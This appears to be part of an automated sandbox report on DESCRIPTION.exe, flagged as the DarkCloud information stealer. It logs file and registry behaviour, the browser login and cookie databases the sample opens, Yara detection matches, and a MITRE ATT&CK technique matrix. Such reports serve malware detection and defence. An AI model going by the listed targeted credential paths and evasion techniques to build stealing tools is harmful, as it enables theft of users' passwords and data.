Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BNAGMGSPLO.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BNAGMGSPLO.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BWETZDQDIB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BWETZDQDIB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BWETZDQDIB.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BWETZDQDIB.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EFOYFBOLXA.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EFOYFBOLXA.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GAOBCVIQIJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GAOBCVIQIJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GAOBCVIQIJ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GAOBCVIQIJ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\IQXRGUNTFT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\IQXRGUNTFT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QCFWYSKMHA.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QCFWYSKMHA.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QCFWYSKMHA.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QCFWYSKMHA.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QLSSZNHVJI.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QLSSZNHVJI.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QNCYCDFIJJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QNCYCDFIJJ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QNCYCDFIJJ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SQSJKEBWDT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SQSJKEBWDT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SQSJKEBWDT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SQSJKEBWDT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SUAVTZKNFL.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SUAVTZKNFL.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SUAVTZKNFL.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SUAVTZKNFL.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WXDORXTPKQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WXDORXTPKQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZIPXYXWIOY.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZIPXYXWIOY.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZIPXYXWIOY.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZIPXYXWIOY.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZQIXMVQGAH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZQIXMVQGAH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Queries volume information: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation

Source: C:\Users\user\Desktop\DESCRIPTION.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DarkCloud

Source: Yara match	File source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DESCRIPTION.exe.3fe4798.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DESCRIPTION.exe.3db4ec0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DESCRIPTION.exe.3fe4798.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DESCRIPTION.exe.3db4ec0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DESCRIPTION.exe.3dfe800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DESCRIPTION.exe PID: 180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OdoiXyuXnaQN.exe PID: 5348, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Yara detected DarkCloud

Source: Yara match	File source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DESCRIPTION.exe.3fe4798.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DESCRIPTION.exe.3db4ec0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DESCRIPTION.exe.3fe4798.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DESCRIPTION.exe.3db4ec0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DESCRIPTION.exe.3dfe800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DESCRIPTION.exe PID: 180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OdoiXyuXnaQN.exe PID: 5348, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 Scheduled Task/Job	112 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	51 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	112 Process Injection	NTDS	51 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DESCRIPTION.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DarkCloud

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
DESCRIPTION.exe